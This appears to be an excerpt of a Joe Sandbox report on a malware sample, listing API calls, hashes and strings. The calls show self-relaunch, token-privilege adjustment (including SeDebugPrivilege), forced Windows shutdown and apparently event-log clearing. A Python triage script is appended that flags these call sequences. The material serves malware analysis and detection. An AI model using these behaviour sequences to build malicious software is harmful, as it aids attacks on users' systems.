                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_get_daylight_invalid_parameter_noinfo$free$___lc_codepage_func__wtomb_environ_getptd_lock
                          • String ID:
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$ClearCloseOpen
                          • String ID: Application$Security$System
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                          • String ID: SeDebugPrivilege
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree$Timetime
                          • String ID:
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree$Timetime
                          • String ID:
                          • API String ID: 3637049079-0
                          • Opcode ID: 3f7189f942930bc74d5e75278d5825dc4c3d285d932db17dfbb9ca7332083d22
                          • Instruction ID: 480f7a039366519aaed11bf22db695fdd0189de9f125ebbae91a286717f6cbe9
                          • Opcode Fuzzy Hash: 3f7189f942930bc74d5e75278d5825dc4c3d285d932db17dfbb9ca7332083d22
                          • Instruction Fuzzy Hash: 69A19E3235068687EB589B2AC1D4BAD77B7F744B84F04852EDA0A87784DF34DE92C780
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                          • API String ID: 0-2761157908
                          • Opcode ID: 8bd9a9bf164ea3d087f418727a36b5ef1a2b669ae8676b0d11799860c2ff5d1e
                          • Instruction ID: 333361272bc56a8551c70c0d7dbb6a6e998a79019e5fa6ca2a8c06f000ba2576
                          • Opcode Fuzzy Hash: 8bd9a9bf164ea3d087f418727a36b5ef1a2b669ae8676b0d11799860c2ff5d1e
                          • Instruction Fuzzy Hash: 4D62BC77B642928AF729AFA5C010FED37B3B754748F419129DE0567A88EB38CE16C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2819658684-0
                          • Opcode ID: a26687288d06543ccd96ee82c763caa90d38d7c723e7feccb07240ac6b5fbf04
                          • Instruction ID: f843386d27404f349c4acb2afa058b99226d5a45a2b5361e2131e44310d92d99
                          • Opcode Fuzzy Hash: a26687288d06543ccd96ee82c763caa90d38d7c723e7feccb07240ac6b5fbf04
                          • Instruction Fuzzy Hash: 6581293279484A0BE70C9E2CCD667F436E7E7E8315F18917EE546CBBE6E624D9438200
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2819658684-0
                          • Opcode ID: c3817968f48e8c550ddf513603500fb7d5119fb71e6552507bce0a96c1220ba0
                          • Instruction ID: 7989841b41b48479a78d1c58f7014b1f6ee72b725a551d3551b216b5f2a864e9
                          • Opcode Fuzzy Hash: c3817968f48e8c550ddf513603500fb7d5119fb71e6552507bce0a96c1220ba0
                          • Instruction Fuzzy Hash: 81611CB2B1168647EB1C8B19EC11BA85277A3D4744F48D13EEA098F7D5E73CEB028740
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: malloc
                          • String ID: $gfff$gfff
                          • API String ID: 2803490479-4202476792
                          • Opcode ID: 7cc1be224e196b4f6ed1a53e46d7184ece0a7e8b7b30a585aeec09b27ae818fa
                          • Instruction ID: 6fb695d7e431bc6859f5cd4fb10ac0727c75fe06be5566b265984550322a4845
                          • Opcode Fuzzy Hash: 7cc1be224e196b4f6ed1a53e46d7184ece0a7e8b7b30a585aeec09b27ae818fa
                          • Instruction Fuzzy Hash: 24E1A370A58A488FEB59EF68D4497A977F2FF59301F10823EE40AD7291EB34D9428781
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2959964966-0
                          • Opcode ID: 328f41f7dfe114806a6c44e27ca05faa19419f9d68533c46d440295ddf3d0012
                          • Instruction ID: d10922f5a4ddef119654b215d10a720b718174782068c11b4ad9c0038ce6382b
                          • Opcode Fuzzy Hash: 328f41f7dfe114806a6c44e27ca05faa19419f9d68533c46d440295ddf3d0012
                          • Instruction Fuzzy Hash: A1328B76B882C68AF764AF65D090BEC37B7A350748F56802ECE4667AC5D739CE478700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _get_daylight
                          • String ID:
                          • API String ID: 4143689357-0
                          • Opcode ID: 382fc29538bcfa4a5651e63f289fab288ad892ffe1de4efe1d8fd15b971a8192
                          • Instruction ID: fcbf14843cc1a38121f0904e549e824074345803d8b565655f156d3e248433e3
                          • Opcode Fuzzy Hash: 382fc29538bcfa4a5651e63f289fab288ad892ffe1de4efe1d8fd15b971a8192
                          • Instruction Fuzzy Hash: 0BA134727946414BE71C8B18CD827F573F7E399304F14913EDA86CBA96EB30EA038681
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _set_error_mode$_errno_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 1239817535-0
                          • Opcode ID: d3cf21d439a7a2adc3bf91effe72efd9b1260cb70a201c5d72699df0ac142f71
                          • Instruction ID: ddfd5831888e5406394feb5293d4cdd3918f86ce7e4f448116565e9f9c6bf67d
                          • Opcode Fuzzy Hash: d3cf21d439a7a2adc3bf91effe72efd9b1260cb70a201c5d72699df0ac142f71
                          • Instruction Fuzzy Hash: 8461A9322989484BFB5CEF28E955BEA72F6E794300F00453EE44BC29D6DF24DE478646
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _set_error_mode$_errno_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 1239817535-0
                          • Opcode ID: 44de1f721c027da7a128cc94a5ad70c9ea0fd816ea6c17f66893cfbd735dff7b
                          • Instruction ID: e3bce266b9bf17945730c6ae6b2607eb783aaa15c511d7da643e005285d73f52
                          • Opcode Fuzzy Hash: 44de1f721c027da7a128cc94a5ad70c9ea0fd816ea6c17f66893cfbd735dff7b
                          • Instruction Fuzzy Hash: E1619C312589884BF758EB24D8567AA73EAEF94300F19463EE45BC21D2DF34DE078645
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _get_daylight$_errno_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3559991230-0
                          • Opcode ID: d84d57091f44413cdc9148be0dd6de948942e62ba8049d02f095d25ff52d526e
                          • Instruction ID: 98f5f661348231132a625482f51f1348618e63428d9fad6c25db781f9edddb00
                          • Opcode Fuzzy Hash: d84d57091f44413cdc9148be0dd6de948942e62ba8049d02f095d25ff52d526e
                          • Instruction Fuzzy Hash: 00912772B542964BF75C8B28E981BD876B7F3A5340F54A13DEA058BB94DB38DF028740
                          APIs
                            • Part of subcall function 000001CFB960EC30: GetModuleFileNameW.KERNEL32 ref: 000001CFB960EC5B
                            • Part of subcall function 000001CFB960EC30: GetCommandLineW.KERNEL32 ref: 000001CFB960EC61
                            • Part of subcall function 000001CFB960EC30: GetStartupInfoW.KERNEL32 ref: 000001CFB960EC6F
                            • Part of subcall function 000001CFB960EC30: CreateProcessW.KERNEL32 ref: 000001CFB960ECB2
                            • Part of subcall function 000001CFB960EC30: ExitProcess.KERNEL32 ref: 000001CFB960ECBB
                            • Part of subcall function 000001CFB960EC30: lstrlenW.KERNEL32 ref: 000001CFB960ECE0
                          • ExitProcess.KERNEL32 ref: 000001CFB960D1DF
                            • Part of subcall function 000001CFB9609240: GetCurrentProcess.KERNEL32 ref: 000001CFB9609257
                            • Part of subcall function 000001CFB9609240: OpenProcessToken.ADVAPI32 ref: 000001CFB960926A
                            • Part of subcall function 000001CFB9609240: LookupPrivilegeValueW.ADVAPI32 ref: 000001CFB9609295
                            • Part of subcall function 000001CFB9609240: AdjustTokenPrivileges.ADVAPI32 ref: 000001CFB96092B8
                            • Part of subcall function 000001CFB9609240: GetLastError.KERNEL32 ref: 000001CFB96092BE
                            • Part of subcall function 000001CFB9609240: CloseHandle.KERNEL32 ref: 000001CFB96092CD
                          • ExitWindowsEx.USER32 ref: 000001CFB960D1F5
                            • Part of subcall function 000001CFB9609240: CloseHandle.KERNEL32 ref: 000001CFB96092E8
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Exit$CloseHandleToken$AdjustCommandCreateCurrentErrorFileInfoLastLineLookupModuleNameOpenPrivilegePrivilegesStartupValueWindowslstrlen
                          • String ID:
                          • API String ID: 3142400414-0
                          • Opcode ID: 788a4e281b37902058700dad6e42fdf71151ef46b325db7974496d36cbdcfe6c
                          • Instruction ID: c909bd9de12979546194144b4a8a6576bbd0084bb35a2423482b17dc932e552b
                          • Opcode Fuzzy Hash: 788a4e281b37902058700dad6e42fdf71151ef46b325db7974496d36cbdcfe6c
                          • Instruction Fuzzy Hash: FBE01A326944C586F72AA730F592BD9B633BB44765F04453F8A5A42582CF39CED6D600
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: @$h
                          • API String ID: 0-1029331998
                          • Opcode ID: a97d71568bbf18846906c7cfef66eb8c9853d60e9d6f82541070b3eacffee3a6
                          • Instruction ID: c84d09991042579d01b48d9ae2232a3fa1e8811e116959133946011223c779bb
                          • Opcode Fuzzy Hash: a97d71568bbf18846906c7cfef66eb8c9853d60e9d6f82541070b3eacffee3a6
                          • Instruction Fuzzy Hash: 9EB19430658B488FEB69EF28D8597EA77E1FB98305F10452EE44AC3251DF38D646CB42
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <$<
                          • API String ID: 0-213342407
                          • Opcode ID: 24aada4ce3280c41e272b614e4f9f9879b9851271430bc6b136f973133d6a926
                          • Instruction ID: cd5a7d7d3bc15cc897d978bdb2041b96bf4d3e4636f26c301cd1f9b8e7f6934e
                          • Opcode Fuzzy Hash: 24aada4ce3280c41e272b614e4f9f9879b9851271430bc6b136f973133d6a926
                          • Instruction Fuzzy Hash: 84915EB0554B498FEB98DF28D4D47D53BE5FB09704F0481BEAC0ECE29ADB7489418B90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID:
                          • String ID: <$<
                          • API String ID: 0-213342407
                          • Opcode ID: 47459b797082c8b7eb25fa5cb46af73bb2a09a72297e0462ec03d068e4451642
                          • Instruction ID: 31fb2be25084ce2f219f51ca923aacb9527921b16e2a8cbf758d3daa8cdeaa7e
                          • Opcode Fuzzy Hash: 47459b797082c8b7eb25fa5cb46af73bb2a09a72297e0462ec03d068e4451642
                          • Instruction Fuzzy Hash: CB9149B06446498FEB98DF28D4947D53BE5FB08704F1881BEAC4ECE29ACB748941CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $h
                          • API String ID: 0-1972213566
                          • Opcode ID: 8d2d61350d6f293ff3527d0ff84e7f1ed3c0625585c1f404535a63bcadf46a6a
                          • Instruction ID: f883986aadee4361b1018d06f95ed75ae0bbf684160031f4d63363ccbb56d298
                          • Opcode Fuzzy Hash: 8d2d61350d6f293ff3527d0ff84e7f1ed3c0625585c1f404535a63bcadf46a6a
                          • Instruction Fuzzy Hash: 1C718E35598A8C8BFB25EF58D855BEA77F2FB94300F44413EE40AC2191DF34DA468A82
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: @$h
                          • API String ID: 0-1029331998
                          • Opcode ID: 8242a0b38d6739619cea6be2c0619ee53481b112f57f2e9511afeb4914a93e91
                          • Instruction ID: 184d2cf08e31e02c58d26b45969c8944794b50a6d035af2f453230b14bf197c5
                          • Opcode Fuzzy Hash: 8242a0b38d6739619cea6be2c0619ee53481b112f57f2e9511afeb4914a93e91
                          • Instruction Fuzzy Hash: BE51A23055CB888FEB24EF58D896BEAB7F1FB98304F10452EA44AC3151DB74DA05CB82
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo_localtime64malloc
                          • String ID:
                          • API String ID: 1702167547-0
                          • Opcode ID: 44d2e760dda43dbf13317c7bf008e214a40517cd38aa3ded51e03e7d631a4a7d
                          • Instruction ID: 594d950ff16d14e9ef40ec67f0a45c4ff400bac4d208a96c1927163128899759
                          • Opcode Fuzzy Hash: 44d2e760dda43dbf13317c7bf008e214a40517cd38aa3ded51e03e7d631a4a7d
                          • Instruction Fuzzy Hash: 19026031254A498BEB19EF64D895BEAB7F5FB54300F10462EE44BC31A1DF34EA46CB81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: [RO] %ld bytes
                          • API String ID: 0-772938740
                          • Opcode ID: 218e82a59ff176e99e028429beedeec697ba52a67a3518fe24719756c9e29cb6
                          • Instruction ID: 28786784c49d61b41d24a69036c78cc6577665db7e6f7851566a808771f11edc
                          • Opcode Fuzzy Hash: 218e82a59ff176e99e028429beedeec697ba52a67a3518fe24719756c9e29cb6
                          • Instruction Fuzzy Hash: A552BE332092C48BD369CF29E48079EBBB2F365B48F448129DBC587B45DB78D955CB50
                          APIs
                            • Part of subcall function 000001CFB9609240: GetCurrentProcess.KERNEL32 ref: 000001CFB9609257
                            • Part of subcall function 000001CFB9609240: OpenProcessToken.ADVAPI32 ref: 000001CFB960926A
                            • Part of subcall function 000001CFB9609240: LookupPrivilegeValueW.ADVAPI32 ref: 000001CFB9609295
                            • Part of subcall function 000001CFB9609240: AdjustTokenPrivileges.ADVAPI32 ref: 000001CFB96092B8
                            • Part of subcall function 000001CFB9609240: GetLastError.KERNEL32 ref: 000001CFB96092BE
                            • Part of subcall function 000001CFB9609240: CloseHandle.KERNEL32 ref: 000001CFB96092CD
                          • ExitWindowsEx.USER32 ref: 000001CFB960D237
                            • Part of subcall function 000001CFB9609240: CloseHandle.KERNEL32 ref: 000001CFB96092E8
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                          • String ID:
                          • API String ID: 681424410-0
                          • Opcode ID: 93a8e1aa9685086c030a71d488bf693f7fa0a72fa2686f4aa742a69fa3c107b5
                          • Instruction ID: ed91b83b7c027b8ad30fa5463758637895bb2f04cce32200113d8ca4e6a378b6
                          • Opcode Fuzzy Hash: 93a8e1aa9685086c030a71d488bf693f7fa0a72fa2686f4aa742a69fa3c107b5
                          • Instruction Fuzzy Hash: 04E0C2332840C081F32AA720F482BD9B233B780324F04413B4A4E021C2CF38CAC7DA00
                          APIs
                            • Part of subcall function 000001CFB9609240: GetCurrentProcess.KERNEL32 ref: 000001CFB9609257
                            • Part of subcall function 000001CFB9609240: OpenProcessToken.ADVAPI32 ref: 000001CFB960926A
                            • Part of subcall function 000001CFB9609240: LookupPrivilegeValueW.ADVAPI32 ref: 000001CFB9609295
                            • Part of subcall function 000001CFB9609240: AdjustTokenPrivileges.ADVAPI32 ref: 000001CFB96092B8
                            • Part of subcall function 000001CFB9609240: GetLastError.KERNEL32 ref: 000001CFB96092BE
                            • Part of subcall function 000001CFB9609240: CloseHandle.KERNEL32 ref: 000001CFB96092CD
                          • ExitWindowsEx.USER32 ref: 000001CFB960D216
                            • Part of subcall function 000001CFB9609240: CloseHandle.KERNEL32 ref: 000001CFB96092E8
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                          • String ID:
                          • API String ID: 681424410-0
                          • Opcode ID: f9c136346c28e24139ecf9977f6f02e26cd8405fe4c95f24200669176c7a3179
                          • Instruction ID: eb5a1030821172c7ca6e446dfd4c1e54f3eaa25ade0f3891b7bf7fc9086d841b
                          • Opcode Fuzzy Hash: f9c136346c28e24139ecf9977f6f02e26cd8405fe4c95f24200669176c7a3179
                          • Instruction Fuzzy Hash: 7AE0C2332840C081F32AA721F482BD9B233B780324F04413B4A4E021C2CF38CAC7CA00
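The three function entries above (ExitWindowsEx at 000001CFB960D1F5, 000001CFB960D237 and 000001CFB960D216) all reach ExitWindowsEx through the same subcall at 000001CFB9609240, which opens the current process token, looks up a privilege and calls AdjustTokenPrivileges; the first entry also relaunches the sample through GetModuleFileNameW, GetCommandLineW, GetStartupInfoW, CreateProcessW and ExitProcess. ExitWindowsEx needs SeShutdownPrivilege to shut down or reboot, which is why the privilege-adjusting subcall precedes it, although the listing itself does not show which privilege name is looked up (the entry's String ID is empty). The Python below is an added triage example, not part of this report and not Joe Sandbox code: it flattens the API lists exactly as printed (caller plus "Part of subcall function" entries, in listing order) into call traces and flags the two ordered call sequences. The pattern names, the ordered-subsequence rule and the control trace are the editor's assumptions.

```python
"""Flag behavioural API-call sequences in a sandbox "Executed Functions" listing.

Added example; not Joe Sandbox code. Traces are transcribed from the report's
API lists; pattern names and the matching rule are the editor's assumptions.
"""

# (api, module, call-site address) as printed for the entry whose own calls are
# ExitProcess @ ...D1DF and ExitWindowsEx @ ...D1F5, subcalls flattened in order.
TRACE_RELAUNCH_AND_SHUTDOWN = [
    ("GetModuleFileNameW", "KERNEL32", 0x1CFB960EC5B),
    ("GetCommandLineW", "KERNEL32", 0x1CFB960EC61),
    ("GetStartupInfoW", "KERNEL32", 0x1CFB960EC6F),
    ("CreateProcessW", "KERNEL32", 0x1CFB960ECB2),
    ("ExitProcess", "KERNEL32", 0x1CFB960ECBB),
    ("lstrlenW", "KERNEL32", 0x1CFB960ECE0),
    ("ExitProcess", "KERNEL32", 0x1CFB960D1DF),
    ("GetCurrentProcess", "KERNEL32", 0x1CFB9609257),
    ("OpenProcessToken", "ADVAPI32", 0x1CFB960926A),
    ("LookupPrivilegeValueW", "ADVAPI32", 0x1CFB9609295),
    ("AdjustTokenPrivileges", "ADVAPI32", 0x1CFB96092B8),
    ("GetLastError", "KERNEL32", 0x1CFB96092BE),
    ("CloseHandle", "KERNEL32", 0x1CFB96092CD),
    ("ExitWindowsEx", "USER32", 0x1CFB960D1F5),
    ("CloseHandle", "KERNEL32", 0x1CFB96092E8),
]

# The entry whose own call is ExitWindowsEx @ ...D237 (the ...D216 entry is
# identical apart from that address); same subcall, transcribed.
TRACE_SHUTDOWN_ONLY = [
    ("GetCurrentProcess", "KERNEL32", 0x1CFB9609257),
    ("OpenProcessToken", "ADVAPI32", 0x1CFB960926A),
    ("LookupPrivilegeValueW", "ADVAPI32", 0x1CFB9609295),
    ("AdjustTokenPrivileges", "ADVAPI32", 0x1CFB96092B8),
    ("GetLastError", "KERNEL32", 0x1CFB96092BE),
    ("CloseHandle", "KERNEL32", 0x1CFB96092CD),
    ("ExitWindowsEx", "USER32", 0x1CFB960D237),
    ("CloseHandle", "KERNEL32", 0x1CFB96092E8),
]

# Constructed control trace (not from the report): a launcher that spawns a
# child and keeps running must not be flagged as a self-relaunch.
TRACE_CONTROL = [
    ("GetModuleFileNameW", "KERNEL32", 0x1000),
    ("CreateProcessW", "KERNEL32", 0x1010),
    ("WaitForSingleObject", "KERNEL32", 0x1020),
]

# Ordered, not necessarily adjacent, call sequences (editor's labels). The
# privilege name passed to LookupPrivilegeValueW is not visible in the listing,
# so the shutdown pattern keys on the ExitWindowsEx call, not on a privilege.
PATTERNS = {
    "self-relaunch": [
        "GetModuleFileNameW", "GetCommandLineW", "GetStartupInfoW",
        "CreateProcessW", "ExitProcess",
    ],
    "privileged-shutdown": [
        "OpenProcessToken", "LookupPrivilegeValueW",
        "AdjustTokenPrivileges", "ExitWindowsEx",
    ],
}


def is_ordered_subsequence(needle, haystack):
    """True if every item of needle occurs in haystack in the same relative order."""
    it = iter(haystack)  # shared iterator: each needle item is searched after the previous hit
    return all(any(item == n for item in it) for n in needle)


def match_patterns(trace, patterns=PATTERNS):
    """Sorted names of the patterns whose call sequence occurs in the trace."""
    names = [api for api, _module, _addr in trace]
    return sorted(name for name, seq in patterns.items()
                  if is_ordered_subsequence(seq, names))


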